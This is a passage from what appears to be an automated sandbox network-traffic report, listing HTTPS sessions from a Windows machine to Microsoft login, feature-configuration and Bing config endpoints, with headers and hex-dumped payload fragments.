                                                                                  2024-04-25 16:23:47 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                  Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                  2024-04-25 16:23:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  70192.168.2.174978640.126.29.9443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:49 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/soap+xml
                                                                                  Accept: */*
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                  Content-Length: 3592
                                                                                  Host: login.live.com
                                                                                  2024-04-25 16:23:49 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                  2024-04-25 16:23:49 UTC569INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-store, no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                  Expires: Thu, 25 Apr 2024 16:22:49 GMT
                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                  x-ms-route-info: C529_SN1
                                                                                  x-ms-request-id: 8e4ff85c-7714-45c8-a2e0-d1509e05f966
                                                                                  PPServer: PPV: 30 H: SN1PEPF0002F96B V: 0
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Date: Thu, 25 Apr 2024 16:23:49 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 11392
                                                                                  2024-04-25 16:23:49 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  71192.168.2.174978713.107.5.88443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:49 UTC537OUTGET /ab HTTP/1.1
                                                                                  Host: evoke-windowsservices-tas.msedge.net
                                                                                  Cache-Control: no-store, no-cache
                                                                                  X-PHOTOS-CALLERID: 9NMPJ99VJBWV
                                                                                  X-EVOKE-RING:
                                                                                  X-WINNEXT-RING: Public
                                                                                  X-WINNEXT-TELEMETRYLEVEL: Basic
                                                                                  X-WINNEXT-OSVERSION: 10.0.19045.0
                                                                                  X-WINNEXT-APPVERSION: 1.23082.131.0
                                                                                  X-WINNEXT-PLATFORM: Desktop
                                                                                  X-WINNEXT-CANTAILOR: False
                                                                                  X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}
                                                                                  X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=
                                                                                  If-None-Match: 2056388360_-1434155563
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  2024-04-25 16:23:49 UTC438INHTTP/1.1 200 OK
                                                                                  Content-Length: 7285
                                                                                  Content-Type: application/json; charset=utf-8
                                                                                  ETag: 1221046810_-1138153652
                                                                                  Strict-Transport-Security: max-age=2592000
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-ExP-TrackingId: 42d1a496-f878-4496-b7a3-90d36aa5bb0a
                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                  X-MSEdge-Ref: Ref A: EFAC387A7CDF4ED9973B7EFD5374C0B0 Ref B: ATL331000104053 Ref C: 2024-04-25T16:23:49Z
                                                                                  Date: Thu, 25 Apr 2024 16:23:49 GMT
                                                                                  Connection: close
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 7b 22 46 65 61 74 75 72 65 73 22 3a 5b 22 68 69 67 68 71 75 61 6c 69 74 79 63 61 70 74 75 72 65 63 22 2c 22 79 6f 61 6c 77 39 38 30 31 63 66 22 2c 22 79 6f 63 33 37 32 31 22 2c 22 61 61 74 65 73 31 32 31 22 2c 22 79 6f 63 61 6c 38 33 30 22 2c 22 65 6d 70 72 6f 37 30 32 22 2c 22 79 6f 6e 6f 6e 32 34 38 22 2c 22 63 6f 6e 74 61 63 74 73 76 32 73 79 6e 63 6f 6e 6c 79 22 2c 22 79 6f 79 70 70 31 31 37 22 2c 22 79 6f 79 70 70 35 36 31 22 2c 22 79 6f 70 68 6f 31 35 36 22 2c 22 79 70 72 6f 6d 65 6c 65 73 73 22 2c 22 79 6f 72 65 6d 37 38 32 22 2c 22 79 6f 72 65 6d 33 32 35 22 2c 22 79 6f 72 6f 6d 39 33 39 22 2c 22 79 6f 79 70 70 36 33 38 22 2c 22 79 6f 61 61 6f 77 63 34 36 63 66 22 2c 22 79 6f 35 35 36 22 2c 22 79 6f 61 61 6f 32 36 37 22 2c 22 79 6f 70 72 69 32 35
                                                                                  Data Ascii: {"Features":["highqualitycapturec","yoalw9801cf","yoc3721","aates121","yocal830","empro702","yonon248","contactsv2synconly","yoypp117","yoypp561","yopho156","ypromeless","yorem782","yorem325","yorom939","yoypp638","yoaaowc46cf","yo556","yoaao267","yopri25
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 2c 22 31 34 67 36 22 3a 22 61 61 74 65 73 31 32 31 22 2c 22 31 38 66 7a 22 3a 22 79 6f 63 61 6c 38 33 30 22 2c 22 31 68 6a 65 22 3a 22 65 6d 70 72 6f 37 30 32 22 2c 22 31 71 61 38 22 3a 22 79 6f 6e 6f 6e 32 34 38 22 2c 22 31 77 6d 74 22 3a 22 63 6f 6e 74 61 63 74 73 76 32 73 79 6e 63 6f 6e 6c 79 22 2c 22 32 69 77 6a 22 3a 22 79 6f 79 70 70 31 31 37 22 2c 22 32 6a 36 61 22 3a 22 79 6f 79 70 70 35 36 31 22 2c 22 32 6b 71 32 22 3a 22 79 6f 70 68 6f 31 35 36 22 2c 22 32 6c 61 64 22 3a 22 79 70 72 6f 6d 65 6c 65 73 73 22 2c 22 32 6f 63 64 22 3a 22 79 6f 72 65 6d 37 38 32 22 2c 22 32 72 65 6b 22 3a 22 79 6f 72 65 6d 33 32 35 22 2c 22 32 73 63 78 22 3a 22 79 6f 72 6f 6d 39 33 39 22 2c 22 32 74 70 33 22 3a 22 79 6f 79 70 70 36 33 38 22 2c 22 33 30 62 38 22 3a 22
                                                                                  Data Ascii: ,"14g6":"aates121","18fz":"yocal830","1hje":"empro702","1qa8":"yonon248","1wmt":"contactsv2synconly","2iwj":"yoypp117","2j6a":"yoypp561","2kq2":"yopho156","2lad":"ypromeless","2ocd":"yorem782","2rek":"yorem325","2scx":"yorom939","2tp3":"yoypp638","30b8":"
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 32 36 34 22 2c 22 35 39 30 71 22 3a 22 34 61 33 30 64 34 35 35 22 2c 22 35 39 67 67 22 3a 22 32 69 32 68 65 31 31 38 22 2c 22 35 39 67 6a 22 3a 22 34 64 65 35 67 35 34 32 22 2c 22 35 39 76 7a 22 3a 22 62 65 63 34 34 37 35 37 22 2c 22 35 61 39 73 22 3a 22 39 38 34 65 39 37 37 34 22 2c 22 35 61 74 6b 22 3a 22 35 35 35 64 37 39 37 38 22 2c 22 35 62 61 74 22 3a 22 65 6a 66 34 36 37 39 35 22 2c 22 35 63 70 66 22 3a 22 34 39 62 34 67 31 33 33 22 2c 22 35 63 72 73 22 3a 22 33 62 66 39 67 38 35 35 22 2c 22 35 64 77 37 22 3a 22 69 34 37 62 65 31 37 38 22 2c 22 35 65 74 36 22 3a 22 32 34 38 66 61 31 38 36 22 2c 22 35 66 6c 32 22 3a 22 68 35 31 66 30 33 34 32 22 2c 22 35 66 79 6f 22 3a 22 68 64 65 31 67 32 36 37 22 2c 22 35 66 79 71 22 3a 22 34 6a 6a 66 62 37 36 38
                                                                                  Data Ascii: 264","590q":"4a30d455","59gg":"2i2he118","59gj":"4de5g542","59vz":"bec44757","5a9s":"984e9774","5atk":"555d7978","5bat":"ejf46795","5cpf":"49b4g133","5crs":"3bf9g855","5dw7":"i47be178","5et6":"248fa186","5fl2":"h51f0342","5fyo":"hde1g267","5fyq":"4jjfb768
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 7d 7d 2c 7b 22 49 64 22 3a 22 59 6f 75 72 50 68 6f 6e 65 22 2c 22 50 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 41 41 4f 57 43 34 36 22 3a 36 34 30 30 2c 22 41 41 4f 57 43 34 37 22 3a 37 34 30 30 2c 22 41 41 4f 57 43 36 31 22 3a 31 36 30 30 2c 22 41 41 4f 57 43 36 32 22 3a 32 36 30 30 2c 22 41 41 4f 57 43 36 33 22 3a 33 36 30 30 2c 22 41 69 72 70 6c 61 6e 65 4d 6f 64 65 53 74 61 74 75 73 22 3a 74 72 75 65 2c 22 41 75 74 6f 48 79 64 72 61 74 65 64 49 6d 61 67 65 73 43 6f 75 6e 74 22 3a 30 2c 22 43 61 6c 6c 69 6e 67 41 6c 74 42 6c 75 65 74 6f 6f 74 68 50 61 69 72 69 6e 67 45 76 65 6e 74 22 3a 74 72 75 65 2c 22 43 61 6c 6c 69 6e 67 45 78 69 74 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 22 3a 74 72 75 65 2c 22 43 61 6c 6c 69 6e 67 4f 53 53 65 72 76 69 63 69 6e 67 46 69
                                                                                  Data Ascii: }},{"Id":"YourPhone","Parameters":{"AAOWC46":6400,"AAOWC47":7400,"AAOWC61":1600,"AAOWC62":2600,"AAOWC63":3600,"AirplaneModeStatus":true,"AutoHydratedImagesCount":0,"CallingAltBluetoothPairingEvent":true,"CallingExitConfirmation":true,"CallingOSServicingFi
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 3a 74 72 75 65 2c 22 49 73 41 75 74 68 56 32 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 4d 65 64 69 61 50 61 63 6b 43 68 65 63 6b 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 43 68 61 74 46 69 6c 74 65 72 54 6f 67 67 6c 65 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 43 6f 6e 73 65 6e 74 56 32 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 43 6f 6e 76 65 72 73 61 74 69 6f 6e 56 69 65 77 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 45 6e 61 62 6c 65 48 69 64 69 6e 67 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 45 6e 61 62 6c 65 4d 75 74 69 6e 67 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 45 6e 61 62 6c 65 50 69 6e 6e 69 6e 67 22 3a 74 72 75 65 2c 22 4d 65 73 73 61 67 69 6e 67 53 65 61 72 63 68 22 3a 74 72 75 65 2c 22
                                                                                  Data Ascii: :true,"IsAuthV2Enabled":true,"MediaPackCheck":true,"MessagingChatFilterToggle":true,"MessagingConsentV2":true,"MessagingConversationView":true,"MessagingEnableHiding":true,"MessagingEnableMuting":true,"MessagingEnablePinning":true,"MessagingSearch":true,"
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 69 6e 67 54 6f 70 30 31 31 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 69 6e 67 54 6f 70 30 31 32 22 3a 74 72 75 65 2c 22 52 65 6d 6f 74 69 6e 67 54 6f 70 30 31 35 22 3a 74 72 75 65 2c 22 52 6f 6d 65 44 69 73 61 62 6c 65 64 22 3a 34 34 31 35 30 33 2c 22 53 65 63 75 72 65 43 6f 6e 74 65 6e 74 22 3a 74 72 75 65 2c 22 53 68 65 6c 6c 45 78 74 65 6e 64 65 64 4c 65 66 74 50 61 6e 65 22 3a 74 72 75 65 2c 22 54 65 73 74 46 65 61 74 75 72 65 32 22 3a 66 61 6c 73 65 2c 22 55 6e 69 76 65 72 73 61 6c 42 6c 75 65 74 6f 6f 74 68 50 61 69 72 69 6e 67 22 3a 74 72 75 65 2c 22 57 68 61 74 73 4e 65 77 43 4e 22 3a 74 72 75 65 2c 22 59 50 50 43 61 74 61 73 74 72 6f 70 68 69 63 45 72 72 6f 72 41 75 74 6f 52 65 73 65 74 22 3a 74 72 75 65 2c 22 59 50 50 43 6f 6e 73 65 63 75 74 69 76
                                                                                  Data Ascii: ingTop011":true,"RemotingTop012":true,"RemotingTop015":true,"RomeDisabled":441503,"SecureContent":true,"ShellExtendedLeftPane":true,"TestFeature2":false,"UniversalBluetoothPairing":true,"WhatsNewCN":true,"YPPCatastrophicErrorAutoReset":true,"YPPConsecutiv
                                                                                  2024-04-25 16:23:49 UTC1024INData Raw: 79 6f 35 35 36 3a 33 30 39 38 36 35 35 36 3b 79 6f 61 61 6f 32 36 37 3a 33 30 34 33 34 36 37 32 3b 79 6f 70 72 69 32 35 37 3a 33 30 34 36 34 34 33 33 3b 79 6f 31 37 39 3a 33 30 34 34 35 33 31 30 3b 79 6f 69 73 61 38 36 31 3a 33 30 35 32 35 38 36 38 3b 79 6f 72 65 6d 31 34 31 3a 33 30 34 38 36 33 35 33 3b 79 6f 79 70 70 36 35 32 3a 33 30 35 31 35 34 38 33 3b 79 6f 35 32 35 3a 33 30 35 35 33 39 38 35 3b 79 6f 36 30 36 3a 33 30 35 32 37 38 35 30 3b 79 6f 6e 6f 74 36 33 33 3a 33 30 36 32 36 30 37 38 3b 79 6f 79 70 70 38 35 39 3a 33 30 36 38 37 38 35 39 3b 79 6f 69 6e 64 36 36 35 3a 33 30 35 39 35 31 36 33 3b 79 6f 64 63 67 38 33 30 3a 33 30 37 31 32 39 34 39 3b 6f 6e 6c 79 5f 74 6f 61 73 74 63 6f 6e 74 65 78 74 6d 65 6e 75 3a 33 30 36 34 38 30 38 31 3b 61 6a
                                                                                  Data Ascii: yo556:30986556;yoaao267:30434672;yopri257:30464433;yo179:30445310;yoisa861:30525868;yorem141:30486353;yoypp652:30515483;yo525:30553985;yo606:30527850;yonot633:30626078;yoypp859:30687859;yoind665:30595163;yodcg830:30712949;only_toastcontextmenu:30648081;aj
                                                                                  2024-04-25 16:23:49 UTC117INData Raw: 38 33 38 35 30 33 3b 35 30 63 37 39 31 30 36 3a 33 30 38 33 38 36 31 39 3b 6a 61 35 63 34 32 34 39 3a 33 31 30 30 36 32 34 34 3b 68 33 65 64 34 31 36 31 3a 33 30 38 39 31 37 38 34 3b 61 62 69 30 67 38 31 37 3a 33 30 39 35 32 38 37 35 3b 61 35 34 66 61 35 37 34 3a 33 30 39 39 33 33 34 39 3b 64 69 66 32 32 32 31 39 3a 33 30 39 36 30 34 30 32 3b 22 7d
                                                                                  Data Ascii: 838503;50c79106:30838619;ja5c4249:31006244;h3ed4161:30891784;abi0g817:30952875;a54fa574:30993349;dif22219:30960402;"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  72192.168.2.174978840.126.29.9443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:49 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/soap+xml
                                                                                  Accept: */*
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                  Content-Length: 4775
                                                                                  Host: login.live.com
                                                                                  2024-04-25 16:23:49 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                  2024-04-25 16:23:50 UTC569INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-store, no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                  Expires: Thu, 25 Apr 2024 16:22:50 GMT
                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                  x-ms-route-info: C529_SN1
                                                                                  x-ms-request-id: b9dc7759-ca59-4605-84dd-d9c6b831caeb
                                                                                  PPServer: PPV: 30 H: SN1PEPF0002F961 V: 0
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Date: Thu, 25 Apr 2024 16:23:49 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 11372
                                                                                  2024-04-25 16:23:50 UTC11372INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  73192.168.2.174978940.126.29.9443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:50 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/soap+xml
                                                                                  Accept: */*
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                  Content-Length: 4788
                                                                                  Host: login.live.com
                                                                                  2024-04-25 16:23:50 UTC4788OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                  2024-04-25 16:23:51 UTC569INHTTP/1.1 200 OK
                                                                                  Cache-Control: no-store, no-cache
                                                                                  Pragma: no-cache
                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                  Expires: Thu, 25 Apr 2024 16:22:50 GMT
                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                  x-ms-route-info: C529_SN1
                                                                                  x-ms-request-id: a53cefa0-ae18-4f9c-8da7-406c5c513304
                                                                                  PPServer: PPV: 30 H: SN1PEPF0002F1B2 V: 0
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Date: Thu, 25 Apr 2024 16:23:50 GMT
                                                                                  Connection: close
                                                                                  Content-Length: 11153
                                                                                  2024-04-25 16:23:51 UTC11153INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  74192.168.2.174979013.107.21.200443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:51 UTC2558OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                  X-Search-CortanaAvailableCapabilities: None
                                                                                  X-Search-SafeSearch: Moderate
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                  X-UserAgeClass: Unknown
                                                                                  X-BM-Market: CH
                                                                                  X-BM-DateFormat: dd/MM/yyyy
                                                                                  X-Device-OSSKU: 48
                                                                                  X-BM-DTZ: 120
                                                                                  X-DeviceID: 01000A41090080B6
                                                                                  X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                  X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                  X-BM-Theme: 000000;0078d7
